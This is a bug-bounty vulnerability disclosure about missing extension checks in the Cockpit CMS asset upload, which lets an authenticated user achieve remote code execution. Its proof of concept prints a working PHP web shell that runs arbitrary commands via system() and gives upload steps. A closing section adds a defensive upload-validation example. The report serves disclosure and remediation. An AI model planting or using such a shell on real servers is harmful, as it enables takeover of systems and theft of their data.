huntr | Choocs | F73EEF49-004F-4B3B-9717-90525E65BA61
History: Mar 09, 2023 - 8:52 a.m.

File Upload Bypass Leads to Remote Code Execution (RCE)

2023-03-09 08:52:18
choocs
www.huntr.dev
13
file upload
server security
rce
command execution
bug bounty

EPSS

0.001

Percentile

37.1%

Description

There are no extension checks during file upload. An attacker may upload a file to execute malicious code on the server.

Proof of Concept

Step 1: Create a file with the content below and save it as evil.php

<html>
<body>
<form method="GET" name="<?php echo basename($_SERVER['PHP_SELF']); ?>">
<input type="TEXT" name="cmd" autofocus id="cmd" size="80">
<input type="SUBMIT" value="Execute">
</form>
<pre>
<?php
    if(isset($_GET['cmd']))
    {
        system($_GET['cmd']);
    }
?>
</pre>
</body>
</html>

Step 2: Log in to the Cockpit web server

Step 3: Go to assets

Step 4: Upload Assets

Step 5: Upload the file that was created.

Step 6: Copy the asset link and paste it into a new tab.

Step 7: Any command can now be executed.
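
A server-side check of the kind the description says is missing, as an added example (not Cockpit's code and not its fix). The function name validate_upload, the allowlist contents and the sample files are assumptions made for illustration; the content check assumes PHP's fileinfo extension is enabled.

```php
<?php
// Added example: hypothetical upload validator, not Cockpit's own code.
// Allowlist: permitted extension => MIME type the file content must have.
const ALLOWED_UPLOADS = [
    'png'  => 'image/png',
    'jpg'  => 'image/jpeg',
    'jpeg' => 'image/jpeg',
    'gif'  => 'image/gif',
    'pdf'  => 'application/pdf',
];

// Returns a safe storage name, or null when the upload must be rejected.
// $clientName is the client-supplied filename; $tmpPath the server temp file.
function validate_upload(string $clientName, string $tmpPath): ?string
{
    // Drop path components; refuse empty names and control characters.
    $base = basename(str_replace('\\', '/', $clientName));
    if ($base === '' || preg_match('/[\x00-\x1f]/', $base)) {
        return null;
    }
    // Only the final extension counts, compared case-insensitively.
    $ext = strtolower(pathinfo($base, PATHINFO_EXTENSION));
    if (!array_key_exists($ext, ALLOWED_UPLOADS)) {
        return null; // evil.php, evil.PHP, evil.phtml, no extension
    }
    // Sniff the content; the client-declared Content-Type is not trusted.
    $mime = (new finfo(FILEINFO_MIME_TYPE))->file($tmpPath);
    if ($mime !== ALLOWED_UPLOADS[$ext]) {
        return null; // e.g. PHP source renamed to .png
    }
    // Never reuse the client's name on disk: random name + vetted extension,
    // so "evil.php.gif" cannot leave a ".php" segment in the stored name.
    return bin2hex(random_bytes(16)) . '.' . $ext;
}

// Constructed sample input: a harmless PHP stand-in and a minimal GIF header.
$php = tempnam(sys_get_temp_dir(), 'up');
file_put_contents($php, "<?php echo 'constructed sample'; ?>");
$gif = tempnam(sys_get_temp_dir(), 'up');
file_put_contents($gif, "GIF89a\x01\x00\x01\x00\x00\x00\x00;");

// Three cases: PHP extension, PHP content under an image name, and
// image content uploaded with a double extension.
var_dump(validate_upload('evil.php', $php));
var_dump(validate_upload('evil.png', $php));
var_dump(validate_upload('evil.php.gif', $gif));
unlink($php);
unlink($gif);
```

The check is only half of the mitigation: uploaded assets should also be stored in a location where the web server does not hand files to the PHP interpreter, so a file that slips through is served as data rather than executed.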
